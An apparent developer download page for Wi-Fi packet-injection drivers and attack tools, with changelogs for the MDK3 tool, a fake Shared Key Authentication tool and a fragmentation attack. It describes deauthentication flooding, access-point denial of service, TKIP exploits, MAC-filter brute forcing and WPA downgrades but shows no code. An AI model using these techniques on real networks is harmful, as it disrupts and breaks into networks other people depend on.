Enhanced
Injection driver for Intel ipw3945
External project by JMF, only
hosted here
This
is based on a driver made for testing purposes called ipwraw. It allows
raw packet Tx/Rx with the Intel PRO/Wireless 3945ABG adapter, it's raw
mode only and can't be used for normal connections to the internet.
ipwraw doesn't have wireless extensions, so this modification adds some
to make it easier to work with programs like aircrack-ng, kismet, mdk,
...
New in ipwraw-ng
2.3.4:
- Added
compatibility fixes for recent kernels (2.6.23 and newer)
- Fixed
bug when setting 5.5 Mb/s rate with iwconfig
- Fixed
bugs (I hope)
in Makefile - it would report that old firmware versions were adequate
and also had some cosmetic glitches
- Added
set TxPower
Wireless Extension. Now TxPower can be set using
iwconfig INTERFACE
txpower TXPOWER
(INTERFACE is normally
wifi0, or eth0; TXPOWER is a the value you want to set, min=-12 and
max=16)
This version includes some fixes ported from ipw3945 driver. It
should be more stable now...
Default speed was left at 54 MBit, you may want to lower it to 1
MBit before injection with iwconfig
wifi0 rate 1M
You will have that configured automatically if you use airmon-ng
from the aircrack-ng suite (changeset 847 or greater)
More information can be found on the included README.ipwraw-ng
file.
Please
contact JMF directly for questions regarding his driver: tolas_feup@hotmail.com
ipwraw-ng-2.3.4-04022008.tar.bz2
Older Versions:
ipwraw-ng-2.0.0-10072007.tar.bz2
ipwraw-ng-1.0.0-21062007.tar.bz2
RaLink
RT73 USB Enhanced Driver
- Support
for Fragmentation Attack
- Interface
is called rausb0 instead of wlan0 to prevent some tools incorrectly
detecting it as wlanng or hostap driver
- Injection
speed can be selected with iwconfig
<interface> rate command. The default speed is 54 MBit.
You may want to lower it to 1 MBit before injection with iwconfig
rausb0 rate 1M
IMPORTANT!
Version 3.0.0 is a new fork from the former serialmonkey CVS. It has
fixes for 2.6.24 and 2.6.25 and does not need setting a MAC Address
before bringing the interface up. This version includes all the
enhancement of the 2.0 series of this driver. If you unplug the card
while its still in use, it may crash your system. So close all
applications accessing it, bring the interface down and then remove the
device.
You may have waited for
this:
Version 3.0.1 has an updated base version from serialmonkey CVS. It is
patched with all the features of 3.0.0 and it has been successfully
tested with 2.6.26 vanilla kernel.
Version 3.0.2 provides kernel version 2.6.27 compatibility.
NOTE: You may also
try the mac80211 drivers included in 2.6.27 or newer since these
drivers are pretty nice too ;)
Version 3.0.3 provides kernel version 2.6.29 compatibility. It uses
default kernel memory allocation for devices' private data area. This
may fail on 64bit platforms (according to RaLink). In previous versions
the driver allocated its own memory and hacked it into the netdev
structure. This hack failed in 2.6.29 and has been removed. However,
the new mode works for me quite well. Please report if any problems
occur.
rt73-k2wrlz-3.0.3.tar.bz2
Older
versions:
rt73-k2wrlz-3.0.2.tar.bz2
rt73-k2wrlz-3.0.1.tar.bz2
rt73-k2wrlz-3.0.0.tar.bz2
rt73-k2wrlz-2.0.1.tar.bz2
rt73-k2wrlz-2.0.0.tar.bz2
rt73-k2wrlz-1.1.0.tar.bz2
rt73-k2wrlz-1.0.0.tar.bz2
RaLink
RT2570 USB Enhanced Driver
- Prism
header can be toggled via iwpriv, no automatic changes which screwed up
packet captures!
- MAC
changing supported
- Support
for Fragmentation Attack
Fragmentation
support is now considered stable. For further details on the
fragmentation attack see the paper from Andrea Bitteau: http://toorcon.org/2005/slides/abittau/
1.5.0 version has some important fixes for kernel version 2.6.19 and
above.
The serialmonkey CVS repository updated its driver from a new RaLink
legacy one. Version 1.6.0 is the modification of this driver with
fragmentation support, MAC changing and prism headers enabled by
default. This driver seems to fix some threading, some SMP and some
endianness issues. So it should be more stable than previous releases.
Version 1.6.1 works for 2.6.22 kernels and comes with some more
stability improvements.
Version 1.6.2 with a new base version from serialmonkey CVS, all the
patches from the previous version and support for 2.6.26 kernel.
Version 1.6.3 adds kernel 2.6.27 compatibility. NOTE: You may also try the mac80211
drivers included in 2.6.27 since these drivers are pretty nice too ;)
Version 1.6.4 adds compatibility with 2.6.29.
rt2570-k2wrlz-1.6.4.tar.bz2
Older
Versions:
rt2570-k2wrlz-1.6.3.tar.bz2
rt2570-k2wrlz-1.6.2.tar.bz2
rt2570-k2wrlz-1.6.1.tar.bz2
rt2570-k2wrlz-1.6.0.tar.bz2
rt2570-k2wrlz-1.5.1.tar.bz2
rt2570-k2wrlz-1.5.0.tar.bz2
rt2570-k2wrlz-1.4.9.tar.bz2
rt2570-k2wrlz-1.4.0.tar.bz2
rt2570-k2wrlz-1.3.0.tar.bz2
rt2570-k2wrlz-1.2.0.tar.bz2
MDK3
The
new MDK3 uses the osdep injection library from the www.aircrack-ng.org project. The
Linux-dependant includes have been removed, mdk3 compiles and runs on
FreeBSD and even Windows (Cygwin). For Windows you need special
drivers, a possibly illegal DLL file and the cygwin environment. Please
see the aircrack-ng website for details about Packet Injection in
Windows.
MDK3 works on the new
mac80211 stack.
If you are a Linux user, just make, make install and have fun.
If you are a FreeBSD user, do the same, and report back to me, if it
works correctly there.
If you are a Windows user, good luck, but expect no support from me.
MDK3 is licenced under GPLv2.
Features:
- Bruteforce
MAC Filters
- Bruteforce
hidden SSIDs (some small SSID wordlists included)
- Probe
networks to check if they can hear you
- intelligent
Authentication-DoS to freeze APs (with success checks)
- FakeAP
- Beacon Flooding with channel hopping (can crash NetStumbler and some
buggy drivers)
- Disconnect
everything (aka AMOK-MODE)
with Deauthentication and Disassociation packets
- WPA
TKIP Denial-of-Service
- WDS
Confusion - Shuts down large scale multi-AP installations
Changelog:
MDK3 version 6
- Amok
Mode now works on Ad-Hoc and MANET networks (WARNING: Clients may not reconnect
automatically, so they may stay disconnected after the attack stopped!)
- Removed
duplicate WPA downgrade in Deauth Mode (sorry for the confusion)
- SSID
Bruteforce Mode understands 0 and 1 byte SSIDs as hidden now, and tries
all lengths
- GCC
4.4 support, all warnings and extra warnings fixed
- Whitelists
and Blacklists in Amok Mode are re-read periodically every 3 seconds.
You can use this to dynamically allow or block hosts with scripts.
- A
lot of small bugfixes
MDK3 version 5
- Enhanced
MAC-Filter Bruteforce Mode
- Another
WDS/WIDS/WIPS Confusion Test
- Amok
Mode supports QoS packets
- Michael
Countermeasure Exploit (also known as TKIP QoS Exploit)
Shuts down APs using TKIP encryption and QoS Extension with 1 sniffed
and 2 injected QoS Data Packets
- WPA-Downgrade
Test - deauthenticates Stations and APs sending WPA encrypted packet
With this test you can check if the sysadmin will try WEP or even
disables encryption
mdk3 will let WEP and unencrypted clients work, so if the sysadmin
simply thinks "WPA is broken" he sure isn't the right one for this job.
(this can/should be combined with social engineering)
MDK3 version 4
- Added
high-speed MAC-Filter Bruteforce Mode (experimental)
Please test this on your APs and report back for optimizing and
bugfixing, thanks!
mdk3-v6.tar.bz2
Old versions:
mdk3-v5.tar.bz2
mdk3-v4.tar.bz2
mdk3-v3.tar.bz2
mdk3-v2.tar.bz2
mdk3-v1.tar.bz2
Ancient mdk2 versions:
mdk2-v36.tar.bz2
mdk2-v35.tar.bz2
mdk2-v34.tar.bz2
Prism2_usb
Injection driver
This
is the first Prism2 USB driver that was able to inject packets. I made
this before Devine had its own one. But i never released it to the
public, however. Instead of his driver, this one seems to be very
stable (was able to crack a whole lot of WEPs with aireplay). It shares
the same issue with Devine's driver, it doesn't inject on kernels newer
than 2.6.11. I can't give any support or help for this since I gave my
prism away. Sorry.
linux-wlan-ng-0.2.3-k2wrlz-usbrawsend.tar.bz2
linux-wlan-ng-0.2.2-k2wrlz-usbrawsend.tar.bz2
Fake
Shared Key Authentication
This
is world's first fully functional code to enable fake authentication on
networks using Shared Key Authentication. You do NOT need to know the key to
authenticate, all you need is a keystream that has been chopped with
aireplay-ng's chopchop attack. Hirte, another developer from the
aircrack-ng community successfully included this code into the aircrack
suite.
Fixed in Version 0.2:
- Show
error when network does not use Shared Key Authentication
- Get
Capability Field from Beacon Frame. (Using the standard capabilities
failed for some APs)
ska-0.2.tar.bz2
ska-0.1.tar.bz2
Fragmentation
Attack
And
another world premiere from me. First implementation of the
Fragmentation Attack on Linux. This attack needs a special driver and
card, that is able to handle the IEEE802.11 fragmentation correctly,
your driver may not work or may need to be updated or modified. The
output of this tool is a file in the aircrack-ng keystream format
(.xor). The output can be used in the same way like the output of the
chopchop attack in aireplay-ng. With that keystream you can build an
ARP packet (arpforge-ng or packetforge-ng). This packet can then be
injected into the target wifi system, generating either answers and/or
fowarded packets increasing the IV count. For an example attack, see
the README in the tarball.
afrag has already been integrated into aireplay-ng, best idea is to get
the aircrack-ng SVN version for the newest fragmentation attack code.
afrag-0.1.tar.bz2
Contact
and Fanclub
If
you want to send some funny stuff,
or if want to join the "official" ASPj Fanclub,
or if you just have some useful patch for any of my software
or if you used my code in any other project,
I would like to get some mail
>> pedro.larbig@carhs.de
<<
Fanclub:
I made up a little list of the people who are in my fanclub. They just
drove crazy due to exaggerated happiness after using my drivers and/or
mdk3:
Fan List
THANK YOU VERY MUCH FOR
THIS AWESOME "FEEDBACK"!
|